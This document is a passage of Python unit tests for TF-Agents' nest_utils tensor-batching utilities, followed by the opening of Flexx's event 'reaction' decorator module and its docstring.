spec: A `tf.TypeSpec`, e.g. `tf.TensorSpec` or `tf.SparseTensorSpec`.
batch_size: The desired batch size; the size of the first dimension of
all tensors.
extra_sizes: An optional list of additional dimension sizes beyond the
batch_size.
Returns:
A possibly nested tuple of Tensors matching the spec.
"""
tensors = []
extra_sizes = extra_sizes or []
for s in tf.nest.flatten(spec):
if isinstance(s, tf.SparseTensorSpec):
if batch_size:
shape = [batch_size] + extra_sizes + s.shape
rank = 1 + len(extra_sizes) + 2
else:
shape = s.shape
rank = 2
tensors.append(
tf.SparseTensor(
indices=tf.zeros([7, rank], dtype=tf.int64),
values=tf.zeros([7], dtype=s.dtype),
dense_shape=tf.constant(shape.as_list(), dtype=tf.int64)))
elif isinstance(s, tf.TensorSpec):
if batch_size:
shape = tf.TensorShape([batch_size] + extra_sizes).concatenate(
s.shape)
else:
shape = s.shape
tensors.append(tf.zeros(shape, dtype=s.dtype))
else:
raise TypeError('Unexpected spec type: {}'.format(s))
return tf.nest.pack_sequence_as(spec, tensors)
def placeholders_from_spec(self, spec):
"""Return tensors matching spec with an added unknown batch dimension.
Args:
spec: A `tf.TypeSpec`, e.g. `tf.TensorSpec` or `tf.SparseTensorSpec`.
Returns:
A possibly nested tuple of Tensors matching the spec.
"""
tensors = []
for s in tf.nest.flatten(spec):
if isinstance(s, tf.SparseTensorSpec):
shape = tf.TensorShape([None]).concatenate(s.shape)
tensors.append(
tf.sparse.from_dense(
tf.compat.v1.placeholder(dtype=s.dtype, shape=shape)))
elif isinstance(s, tf.TensorSpec):
shape = tf.TensorShape([None]).concatenate(s.shape)
tensors.append(tf.compat.v1.placeholder(dtype=s.dtype, shape=shape))
else:
raise TypeError('Unexpected spec type: {}'.format(s))
return tf.nest.pack_sequence_as(spec, tensors)
def testGetOuterShapeNotBatched(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_size = nest_utils.get_outer_shape(tensor, spec)
self.assertAllEqual(self.evaluate(batch_size), [])
def testGetOuterShapeOneDim(self):
tensor = tf.zeros([5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_size = nest_utils.get_outer_shape(tensor, spec)
self.assertEqual(self.evaluate(batch_size), [5])
def testGetOuterShapeTwoDims(self):
tensor = tf.zeros([7, 5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_dim = nest_utils.get_outer_shape(tensor, spec)
self.assertAllEqual(self.evaluate(batch_dim), [7, 5])
def testGetOuterShapeDynamicShapeBatched(self):
spec = tensor_spec.TensorSpec([1], dtype=tf.float32)
tensor = tf.convert_to_tensor(value=[[0.0]] * 8)
batch_size = self.evaluate(nest_utils.get_outer_shape(tensor, spec))
self.assertAllEqual(batch_size, [8])
def testGetOuterShapeDynamicShapeNotBatched(self):
spec = tensor_spec.TensorSpec([None, 1], dtype=tf.float32)
tensor = tf.convert_to_tensor(value=[[0.0]] * 8)
batch_size = self.evaluate(nest_utils.get_outer_shape(tensor, spec))
self.assertAllEqual(batch_size, [])
def testGetOuterDimsSingleTensorUnbatched(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_dims = nest_utils.get_outer_rank(tensor, spec)
self.assertFalse(batch_dims)
def testGetOuterDimsSingleTensorBatched(self):
tensor = tf.zeros([5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batch_dims = nest_utils.get_outer_rank(tensor, spec)
self.assertEqual(batch_dims, 1)
def testGetOuterDimsSpecMismatchUnbatched(self):
tensor = tf.zeros([1, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.get_outer_rank(tensor, spec)
def testGetOuterDimsSpecMismatchBatched(self):
tensor = tf.zeros([5, 1, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.get_outer_rank(tensor, spec)
def testGetOuterDimsNestedTensorsUnbatched(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs)
batch_dims = nest_utils.get_outer_rank(tensors, specs)
self.assertFalse(batch_dims)
def testGetOuterDimsNestedTensorsBatched(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
batch_dims = nest_utils.get_outer_rank(tensors, specs)
self.assertEqual(batch_dims, 1)
def testGetOuterDimsNestedTensorsMixed(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
tensors['tensor_spec_1'] = tf.zeros(shape)
with self.assertRaises(ValueError):
nest_utils.get_outer_rank(tensors, specs)
def testGetOuterDimsNestedTensorsMultipleBatchDims(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[2])
batch_dims = nest_utils.get_outer_rank(tensors, specs)
self.assertEqual(batch_dims, 2)
def testGetOuterDimsNestedTensorsMultipleBatchDimsMixed(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[2])
# Tensors are ok.
self.assertEqual(nest_utils.get_outer_rank(tensors, specs), 2)
with self.assertRaises(ValueError):
tensors['tensor_spec_1'] = tf.zeros_like(tensors['tensor_spec_1'][0])
# Tensors are not ok.
nest_utils.get_outer_rank(tensors, specs)
def testIsBatchedSingleTensorFalse(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
is_batched = nest_utils.is_batched_nested_tensors(tensor, spec)
self.assertFalse(is_batched)
def testIsBatchedSingleTensorTrue(self):
tensor = tf.zeros([5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
is_batched = nest_utils.is_batched_nested_tensors(tensor, spec)
self.assertTrue(is_batched)
def testIsBatchedSingleTensorValueErrorUnBatched(self):
tensor = tf.zeros([1, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.is_batched_nested_tensors(tensor, spec)
def testIsBatchedSingleTensorValueErrorBatched(self):
tensor = tf.zeros([5, 1, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.is_batched_nested_tensors(tensor, spec)
def testIsBatchedNestedTensorsFalse(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs)
is_batched = nest_utils.is_batched_nested_tensors(tensors, specs)
self.assertFalse(is_batched)
def testIsBatchedNestedTensorsTrue(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
is_batched = nest_utils.is_batched_nested_tensors(tensors, specs)
self.assertTrue(is_batched)
def testIsBatchedNestedTensorsAllowExtraFields(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
tensors['extra_field'] = tf.constant([1, 2, 3])
is_batched = nest_utils.is_batched_nested_tensors(
tensors, specs, allow_extra_fields=True)
self.assertTrue(is_batched)
def testIsBatchedNestedTensorsMixed(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2)
tensors['tensor_spec_1'] = tf.zeros(shape)
with self.assertRaises(ValueError):
nest_utils.is_batched_nested_tensors(tensors, specs)
def testIsBatchedNestedTensorsMultipleBatchDimsFalse(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs)
is_batched = nest_utils.is_batched_nested_tensors(
tensors, specs, num_outer_dims=2)
self.assertFalse(is_batched)
def testIsBatchedNestedTensorsMultipleBatchDimsTrue(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[2])
is_batched = nest_utils.is_batched_nested_tensors(
tensors, specs, num_outer_dims=2)
self.assertTrue(is_batched)
def testIsBatchedNestedTensorsMultipleBatchDimsWrongBatchDimNumber(self):
shape = [2, 3]
specs = self.nest_spec(shape)
# Tensors only have one batch dim.
tensors = self.zeros_from_spec(specs, batch_size=2)
is_batched = nest_utils.is_batched_nested_tensors(tensors,
specs,
num_outer_dims=2)
self.assertFalse(is_batched)
def testIsBatchedNestedTensorsMultipleBatchDimsRightBatchDimNumber(self):
shape = [2, 3]
specs = self.nest_spec(shape)
# Tensors only have one batch dim.
tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[1])
is_batched = nest_utils.is_batched_nested_tensors(tensors,
specs,
num_outer_dims=2)
self.assertTrue(is_batched)
def testIsBatchedNestedTensorsMultipleBatchDimsMixed(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=2, extra_sizes=[2])
# Tensors are ok.
nest_utils.is_batched_nested_tensors(tensors, specs, num_outer_dims=2)
with self.assertRaises(ValueError):
tensors['tensor_spec_1'] = tf.zeros_like(tensors['tensor_spec_1'][0])
# Tensors are not ok.
nest_utils.is_batched_nested_tensors(tensors, specs, num_outer_dims=2)
def testBatchSingleTensor(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batched_tensor = nest_utils.batch_nested_tensors(tensor, spec)
self.assertEqual(batched_tensor.shape.as_list(), [1, 2, 3])
def testBatchedSingleTensor(self):
tensor = tf.zeros([5, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
batched_tensor = nest_utils.batch_nested_tensors(tensor, spec)
self.assertEqual(batched_tensor.shape.as_list(), [5, 2, 3])
def testWrongShapeRaisesValueError(self):
tensor = tf.zeros([3, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
with self.assertRaises(ValueError):
nest_utils.batch_nested_tensors(tensor, spec)
def testBatchNestedTensorsNoSpec(self):
shape = [2, 3]
batch_shape = [1] + shape
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs)
tf.nest.assert_same_structure(tensors, specs)
batched_tensors = nest_utils.batch_nested_tensors(tensors)
tf.nest.assert_same_structure(specs, batched_tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), batch_shape)
tf.nest.map_structure(assert_shapes, batched_tensors)
def testBatchNestedTensors(self):
shape = [2, 3]
batch_shape = [1] + shape
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs)
tf.nest.assert_same_structure(tensors, specs)
batched_tensors = nest_utils.batch_nested_tensors(tensors, specs)
tf.nest.assert_same_structure(specs, batched_tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), batch_shape)
tf.nest.map_structure(assert_shapes, batched_tensors)
def testBatchedNestedTensors(self):
shape = [2, 3]
batch_size = 5
batch_shape = [batch_size] + shape
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=batch_size)
tf.nest.assert_same_structure(tensors, specs)
batched_tensors = nest_utils.batch_nested_tensors(tensors, specs)
tf.nest.assert_same_structure(specs, batched_tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), batch_shape)
tf.nest.map_structure(assert_shapes, batched_tensors)
def testUnBatchSingleTensor(self):
batched_tensor = tf.zeros([1, 2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
tensor = nest_utils.unbatch_nested_tensors(batched_tensor, spec)
self.assertEqual(tensor.shape.as_list(), [2, 3])
def testUnBatchedSingleTensor(self):
tensor = tf.zeros([2, 3], dtype=tf.float32)
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
unbatched_tensor = nest_utils.unbatch_nested_tensors(tensor, spec)
self.assertEqual(unbatched_tensor.shape.as_list(), [2, 3])
def testUnBatchNestedTensorsNoSpec(self):
shape = [2, 3]
batch_size = 1
specs = self.nest_spec(shape, include_sparse=False)
batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
tf.nest.assert_same_structure(batched_tensors, specs)
tensors = nest_utils.unbatch_nested_tensors(batched_tensors)
tf.nest.assert_same_structure(specs, tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), shape, t)
tf.nest.map_structure(assert_shapes, tensors)
def testUnBatchNestedTensors(self):
shape = [2, 3]
batch_size = 1
specs = self.nest_spec(shape, include_sparse=False)
batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
tf.nest.assert_same_structure(batched_tensors, specs)
tensors = nest_utils.unbatch_nested_tensors(batched_tensors, specs)
tf.nest.assert_same_structure(specs, tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), shape, t)
tf.nest.map_structure(assert_shapes, tensors)
def testSplitNestedTensors(self):
shape = [2, 3]
batch_size = 7
specs = self.nest_spec(shape, include_sparse=True)
batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
tf.nest.assert_same_structure(batched_tensors, specs)
tensors = nest_utils.split_nested_tensors(batched_tensors, specs,
batch_size)
self.assertEqual(batch_size, len(tensors))
for t in tensors:
tf.nest.assert_same_structure(specs, t)
def assert_shapes(t):
if not tf.executing_eagerly() and isinstance(t, tf.SparseTensor):
# Constant value propagation in SparseTensors does not allow us to infer
# the value of output t.shape from input's t.shape; only its rank.
self.assertEqual(len(t.shape), 1 + len(shape))
else:
self.assertEqual(t.shape.as_list(), [1] + shape)
tf.nest.map_structure(assert_shapes, tensors)
def testSplitNestedTensorsSizeSplits(self):
shape = [2, 3]
batch_size = 9
size_splits = [2, 4, 3]
specs = self.nest_spec(shape, include_sparse=False)
batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
tf.nest.assert_same_structure(batched_tensors, specs)
tensors = nest_utils.split_nested_tensors(
batched_tensors, specs, size_splits)
self.assertEqual(len(tensors), len(size_splits))
for i, tensor in enumerate(tensors):
tf.nest.assert_same_structure(specs, tensor)
tf.nest.map_structure(
lambda t: self.assertEqual(t.shape.as_list()[0], size_splits[i]), # pylint: disable=cell-var-from-loop
tensor)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list()[1:], shape)
tf.nest.map_structure(assert_shapes, tensors)
def testUnstackNestedTensors(self):
shape = [5, 8]
batch_size = 7
specs = self.nest_spec(shape, include_sparse=False)
batched_tensors = self.zeros_from_spec(specs, batch_size=batch_size)
tf.nest.assert_same_structure(batched_tensors, specs)
tensors = nest_utils.unstack_nested_tensors(batched_tensors, specs)
self.assertEqual(batch_size, len(tensors))
for t in tensors:
tf.nest.assert_same_structure(specs, t)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), shape)
tf.nest.map_structure(assert_shapes, tensors)
def testStackNestedTensors(self):
shape = [5, 8]
batch_size = 3
batched_shape = [batch_size,] + shape
specs = self.nest_spec(shape, include_sparse=False)
unstacked_tensors = [self.zeros_from_spec(specs) for _ in range(batch_size)]
stacked_tensor = nest_utils.stack_nested_tensors(unstacked_tensors)
tf.nest.assert_same_structure(specs, stacked_tensor)
assert_shapes = lambda tensor: self.assertEqual(tensor.shape, batched_shape)
tf.nest.map_structure(assert_shapes, stacked_tensor)
def testStackNestedTensorsAxis1(self):
shape = [5, 8]
stack_dim = 3
stacked_shape = [5, 3, 8]
specs = self.nest_spec(shape, include_sparse=False)
unstacked_tensors = [self.zeros_from_spec(specs)] * stack_dim
stacked_tensor = nest_utils.stack_nested_tensors(unstacked_tensors, axis=1)
tf.nest.assert_same_structure(specs, stacked_tensor)
assert_shapes = lambda tensor: self.assertEqual(tensor.shape, stacked_shape)
tf.nest.map_structure(assert_shapes, stacked_tensor)
def testUnBatchedNestedTensors(self, include_sparse=False):
shape = [2, 3]
specs = self.nest_spec(shape, include_sparse=False)
unbatched_tensors = self.zeros_from_spec(specs)
tf.nest.assert_same_structure(unbatched_tensors, specs)
tensors = nest_utils.unbatch_nested_tensors(unbatched_tensors, specs)
tf.nest.assert_same_structure(specs, tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), shape, t)
tf.nest.map_structure(assert_shapes, tensors)
def testFlattenMultiBatchedSingleTensor(self):
spec = tensor_spec.TensorSpec([2, 3], dtype=tf.float32)
tensor = self.zeros_from_spec(spec, batch_size=7, extra_sizes=[5])
(batch_flattened_tensor,
batch_dims) = nest_utils.flatten_multi_batched_nested_tensors(tensor, spec)
self.assertEqual(batch_flattened_tensor.shape.as_list(), [35, 2, 3])
self.evaluate(tf.compat.v1.global_variables_initializer())
batch_dims_ = self.evaluate(batch_dims)
self.assertAllEqual(batch_dims_, [7, 5])
def testFlattenMultiBatchedNestedTensors(self):
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=7, extra_sizes=[5])
(batch_flattened_tensors,
batch_dims) = nest_utils.flatten_multi_batched_nested_tensors(
tensors, specs)
tf.nest.assert_same_structure(specs, batch_flattened_tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), [35, 2, 3])
tf.nest.map_structure(assert_shapes, batch_flattened_tensors)
self.evaluate(tf.compat.v1.global_variables_initializer())
batch_dims_ = self.evaluate(batch_dims)
self.assertAllEqual(batch_dims_, [7, 5])
def testFlattenMultiBatchedNestedTensorsWithPartiallyKnownShape(self):
if tf.executing_eagerly():
self.skipTest('Do not check nest processing of data in eager mode. '
'Placeholders are not compatible with eager execution.')
shape = [2, 3]
specs = self.nest_spec(shape, include_sparse=False)
tensors = self.placeholders_from_spec(specs)
(batch_flattened_tensors,
_) = nest_utils.flatten_multi_batched_nested_tensors(
tensors, specs)
tf.nest.assert_same_structure(specs, batch_flattened_tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), [None, 2, 3])
tf.nest.map_structure(assert_shapes, batch_flattened_tensors)
def testFlattenMultiBatchedNestedTensorsWithSparseTensor(self):
if tf.executing_eagerly():
self.skipTest('Do not check nest processing of data in eager mode. '
'Placeholders are not compatible with eager execution.')
shape = [2, 3]
specs = self.nest_spec(shape)
tensors = self.zeros_from_spec(specs, batch_size=7, extra_sizes=[5])
(batch_flattened_tensors,
_) = nest_utils.flatten_multi_batched_nested_tensors(tensors, specs)
tf.nest.assert_same_structure(specs, batch_flattened_tensors)
assert_shapes = lambda t: self.assertEqual(t.shape.as_list(), [35, 2, 3])
tf.nest.map_structure(assert_shapes, batch_flattened_tensors)
def testFlattenMultiBatchedNestedTensorsWithPartiallyKnownSparseTensor(self):
if tf.executing_eagerly():
self.skipTest('Do not check nest processing of data in eager mode. '
'Placeholders are not compatible with eager execution.')
shape = [2, None]
specs = self.nest_spec(shape)
tensors = self.placeholders_from_spec(specs)
(batch_flattened_tensors,
_) = nest_utils.flatten_multi_batched_nested_tensors(tensors, specs)
tf.nest.assert_same_structure(specs, batch_flattened_tensors)
def assert_shapes(t):
if isinstance(t, tf.SparseTensor):
self.assertEqual(t.shape.rank, 3)
else:
self.assertEqual(t.shape.as_list(), [None, 2, None])
tf.nest.map_structure(assert_shapes, batch_flattened_tensors)
class NestedArraysTest(tf.test.TestCase):
"""Tests functions related to nested arrays."""
def nest_spec(self, shape=(2, 3), dtype=np.float32):
return {
'array_spec_1':
array_spec.ArraySpec(shape, dtype),
'bounded_spec_1':
array_spec.BoundedArraySpec(shape, dtype, -10, 10),
'dict_spec': {
'tensor_spec_2':
array_spec.ArraySpec(shape, dtype),
'bounded_spec_2':
array_spec.BoundedArraySpec(shape, dtype, -10, 10)
},
'tuple_spec': (
array_spec.ArraySpec(shape, dtype),
array_spec.BoundedArraySpec(shape, dtype, -10, 10),
),
'list_spec': [
array_spec.ArraySpec(shape, dtype),
(array_spec.ArraySpec(shape, dtype),
array_spec.BoundedArraySpec(shape, dtype, -10, 10)),
],
}
def zeros_from_spec(self, specs, outer_dims=None):
"""Return arrays matching spec with desired additional dimensions.
Args:
specs: A nested array spec.
outer_dims: An optional list of outer dimensions, e.g. batch size.
Returns:
A nested tuple of arrays matching the spec.
"""
outer_dims = outer_dims or []
def _zeros(spec):
return np.zeros(type(spec.shape)(outer_dims) + spec.shape, spec.dtype)
return tf.nest.map_structure(_zeros, specs)
def testUnstackNestedArrays(self):
shape = (5, 8)
batch_size = 3
specs = self.nest_spec(shape)
batched_arrays = self.zeros_from_spec(specs, outer_dims=[batch_size])
unbatched_arrays = nest_utils.unstack_nested_arrays(batched_arrays)
self.assertEqual(batch_size, len(unbatched_arrays))
for array in unbatched_arrays:
tf.nest.assert_same_structure(specs, array)
assert_shapes = lambda a: self.assertEqual(a.shape, shape)
tf.nest.map_structure(assert_shapes, unbatched_arrays)
def testUnstackNestedArraysIntoFlatItems(self):
shape = (5, 8)
batch_size = 3
specs = self.nest_spec(shape)
batched_arrays = self.zeros_from_spec(specs, outer_dims=[batch_size])
unbatched_flat_items = nest_utils.unstack_nested_arrays_into_flat_items(
batched_arrays)
self.assertEqual(batch_size, len(unbatched_flat_items))
for nested_array, flat_item in zip(
nest_utils.unstack_nested_arrays(batched_arrays), unbatched_flat_items):
self.assertAllEqual(flat_item, tf.nest.flatten(nested_array))
tf.nest.assert_same_structure(specs,
tf.nest.pack_sequence_as(specs, flat_item))
assert_shapes = lambda a: self.assertEqual(a.shape, shape)
tf.nest.map_structure(assert_shapes, unbatched_flat_items)
def testUnstackNestedArray(self):
shape = (5, 8)
batch_size = 1
specs = self.nest_spec(shape)
batched_arrays = self.zeros_from_spec(specs, outer_dims=[batch_size])
unbatched_arrays = nest_utils.unstack_nested_arrays(batched_arrays)
self.assertEqual(batch_size, len(unbatched_arrays))
for array in unbatched_arrays:
tf.nest.assert_same_structure(specs, array)
assert_shapes = lambda a: self.assertEqual(a.shape, shape)
tf.nest.map_structure(assert_shapes, unbatched_arrays)
def testStackNestedArrays(self):
shape = (5, 8)
batch_size = 3
batched_shape = (batch_size,) + shape
specs = self.nest_spec(shape)
unstacked_arrays = [self.zeros_from_spec(specs) for _ in range(batch_size)]
stacked_array = nest_utils.stack_nested_arrays(unstacked_arrays)
tf.nest.assert_same_structure(specs, stacked_array)
assert_shapes = lambda a: self.assertEqual(a.shape, batched_shape)
tf.nest.map_structure(assert_shapes, stacked_array)
def testGetOuterArrayShape(self):
spec = (
array_spec.ArraySpec([5, 8], np.float32),
(array_spec.ArraySpec([1], np.int32),
array_spec.ArraySpec([2, 2, 2], np.float32))
)
batch_size = 3
unstacked_arrays = [self.zeros_from_spec(spec) for _ in range(batch_size)]
outer_dims = nest_utils.get_outer_array_shape(unstacked_arrays[0], spec)
self.assertEqual((), outer_dims)
stacked_array = nest_utils.stack_nested_arrays(unstacked_arrays)
outer_dims = nest_utils.get_outer_array_shape(stacked_array, spec)
self.assertEqual((batch_size,), outer_dims)
time_dim = [nest_utils.batch_nested_array(arr) for arr in unstacked_arrays]
batch_time = nest_utils.stack_nested_arrays(time_dim)
outer_dims = nest_utils.get_outer_array_shape(batch_time, spec)
self.assertEqual((batch_size, 1), outer_dims)
def testWhere(self):
condition = tf.convert_to_tensor([True, False, False, True, False])
true_output = tf.nest.map_structure(tf.convert_to_tensor,
(np.array([0] * 5), np.arange(1, 6)))
false_output = tf.nest.map_structure(tf.convert_to_tensor,
(np.array([1] * 5), np.arange(6, 11)))
result = nest_utils.where(condition, true_output, false_output)
result = self.evaluate(result)
expected = (np.array([0, 1, 1, 0, 1]), np.array([1, 7, 8, 4, 10]))
self.assertAllEqual(expected, result)
def testWhereDifferentRanks(self):
condition = tf.convert_to_tensor([True, False, False, True, False])
true_output = tf.nest.map_structure(
tf.convert_to_tensor,
(np.reshape(np.array([0] * 10),
(5, 2)), np.reshape(np.arange(1, 11), (5, 2))))
false_output = tf.nest.map_structure(
tf.convert_to_tensor,
(np.reshape(np.array([1] * 10),
(5, 2)), np.reshape(np.arange(12, 22), (5, 2))))
result = nest_utils.where(condition, true_output, false_output)
result = self.evaluate(result)
expected = (np.array([[0, 0], [1, 1], [1, 1], [0, 0], [1, 1]]),
np.array([[1, 2], [14, 15], [16, 17], [7, 8], [20, 21]]))
self.assertAllEqual(expected, result)
def testWhereSameRankDifferentDimension(self):
condition = tf.convert_to_tensor([True, False, True])
true_output = (tf.convert_to_tensor([1]), tf.convert_to_tensor([2]))
false_output = (tf.convert_to_tensor([3, 4, 5]),
tf.convert_to_tensor([6, 7, 8]))
result = nest_utils.where(condition, true_output, false_output)
result = self.evaluate(result)
expected = (np.array([1, 4, 1]), np.array([2, 7, 2]))
self.assertAllEqual(expected, result)
class PruneExtraKeysTest(tf.test.TestCase):
def testPruneExtraKeys(self):
self.assertEqual(nest_utils.prune_extra_keys({}, {'a': 1}), {})
self.assertEqual(nest_utils.prune_extra_keys((), {'a': 1}), ())
self.assertEqual(nest_utils.prune_extra_keys(
{'a': 1}, {'a': 'a'}), {'a': 'a'})
self.assertEqual(
nest_utils.prune_extra_keys({'a': 1}, {'a': 'a', 'b': 2}), {'a': 'a'})
self.assertEqual(
nest_utils.prune_extra_keys([{'a': 1}], [{'a': 'a', 'b': 2}]),
[{'a': 'a'}])
self.assertEqual(
nest_utils.prune_extra_keys({'a': (), 'b': None}, {'a': 1, 'b': 2}),
{'a': (), 'b': 2})
self.assertEqual(
nest_utils.prune_extra_keys(
{'a': {'aa': 1, 'ab': 2}, 'b': {'ba': 1}},
{'a': {'aa': 'aa', 'ab': 'ab', 'ac': 'ac'},
'b': {'ba': 'ba', 'bb': 'bb'},
'c': 'c'}),
{'a': {'aa': 'aa', 'ab': 'ab'}, 'b': {'ba': 'ba'}})
self.assertEqual(
nest_utils.prune_extra_keys(
{'a': ()},
DictWrapper({'a': DictWrapper({'b': None})})),
{'a': ()})
self.assertEqual(
nest_utils.prune_extra_keys(
{'a': 1, 'c': 2},
DictWrapper({'a': DictWrapper({'b': None})})),
{'a': {'b': None}})
def testInvalidWide(self):
self.assertEqual(nest_utils.prune_extra_keys(None, {'a': 1}), {'a': 1})
self.assertEqual(nest_utils.prune_extra_keys({'a': 1}, {}), {})
self.assertEqual(nest_utils.prune_extra_keys(
{'a': 1}, {'c': 'c'}), {'c': 'c'})
self.assertEqual(nest_utils.prune_extra_keys([], ['a']), ['a'])
self.assertEqual(
nest_utils.prune_extra_keys([{}, {}], [{'a': 1}]), [{'a': 1}])
def testNamedTuple(self):
class A(collections.namedtuple('A', ('a', 'b'))):
pass
self.assertEqual(
nest_utils.prune_extra_keys(
[A(a={'aa': 1}, b=3), {'c': 4}],
[A(a={'aa': 'aa', 'ab': 'ab'}, b='b'), {'c': 'c', 'd': 'd'}]),
[A(a={'aa': 'aa'}, b='b'), {'c': 'c'}])
def testSubtypesOfListAndDict(self):
class A(collections.namedtuple('A', ('a', 'b'))):
pass
self.assertEqual(
nest_utils.prune_extra_keys(
[data_structures.ListWrapper([None, DictWrapper({'a': 3, 'b': 4})]),
None,
TupleWrapper((DictWrapper({'g': 5}),)),
TupleWrapper(A(None, DictWrapper({'h': 6}))),
],
[['x', {'a': 'a', 'b': 'b', 'c': 'c'}],
'd',
({'g': 'g', 'gg': 'gg'},),
A(None, {'h': 'h', 'hh': 'hh'}),
]),
[data_structures.ListWrapper([
'x', DictWrapper({'a': 'a', 'b': 'b'})]),
'd',
TupleWrapper((DictWrapper({'g': 'g'}),)),
TupleWrapper(A(None, DictWrapper({'h': 'h'}),)),
])
def testOrderedDict(self):
OD = collections.OrderedDict # pylint: disable=invalid-name
self.assertEqual(
nest_utils.prune_extra_keys(
OD([('a', OD([('aa', 1), ('ab', 2)])),
('b', OD([('ba', 1)]))]),
OD([('a', OD([('aa', 'aa'), ('ab', 'ab'), ('ac', 'ac')])),
('b', OD([('ba', 'ba'), ('bb', 'bb')])),
('c', 'c')])),
OD([('a', OD([('aa', 'aa'), ('ab', 'ab')])),
('b', OD([('ba', 'ba')]))])
)
class TileBatchTest(tf.test.TestCase):
def test_tile_batch(self):
t = tf.constant([[1., 2., 3.], [4., 5., 6.]])
t_tile_batched = nest_utils.tile_batch(t, 2)
expected_t_tile_batched = tf.constant(
[[1., 2., 3.], [1., 2., 3.], [4., 5., 6.], [4., 5., 6.]])
self.assertAllEqual(
self.evaluate(expected_t_tile_batched), self.evaluate(t_tile_batched))
self.assertAllEqual((4, 3), t_tile_batched.shape)
if __name__ == '__main__':
tf.test.main()
|
|
"""
Implements the reaction decorator, class and desciptor.
"""
# Note: there are some unusual constructs here, such as ``if xx is True``.
# These are there to avoid inefficient JS code as this code is transpiled
# using PScript. This code is quite performance crirical.
import weakref
import inspect
from ._loop import this_is_js
from ._action import BaseDescriptor
from ._dict import Dict
from . import logger
window = None
console = logger
def looks_like_method(func):
if hasattr(func, '__func__'):
return False # this is a bound method
try:
return list(inspect.signature(func).parameters)[0] in ('self', 'this')
except (TypeError, IndexError, ValueError):
return False
def reaction(*connection_strings, mode='normal'):
""" Decorator to turn a method of a Component into a
:class:`Reaction <flexx.event.Reaction>`.
A reaction can be connected to multiple event types. Each connection
string represents an event type to connect to.
Also see the
:func:`Component.reaction() <flexx.event.Component.reaction>` method.
.. code-block:: py
class MyObject(event.Component):
@event.reaction('first_name', 'last_name')
def greet(self, *events):
print('hello %s %s' % (self.first_name, self.last_name))
A reaction can operate in a few different modes. By not specifying any
connection strings, the mode is "auto": the reaction will automatically
trigger when any of the properties used in the function changes.
See :func:`get_mode() <flexx.event.Reaction.get_mode>` for details.
Connection string follow the following syntax rules:
* Connection strings consist of parts separated by dots, thus forming a path.
If an element on the path is a property, the connection will automatically
reset when that property changes (a.k.a. dynamism, more on this below).
* Each part can end with one star ('*'), indicating that the part is a list
and that a connection should be made for each item in the list.
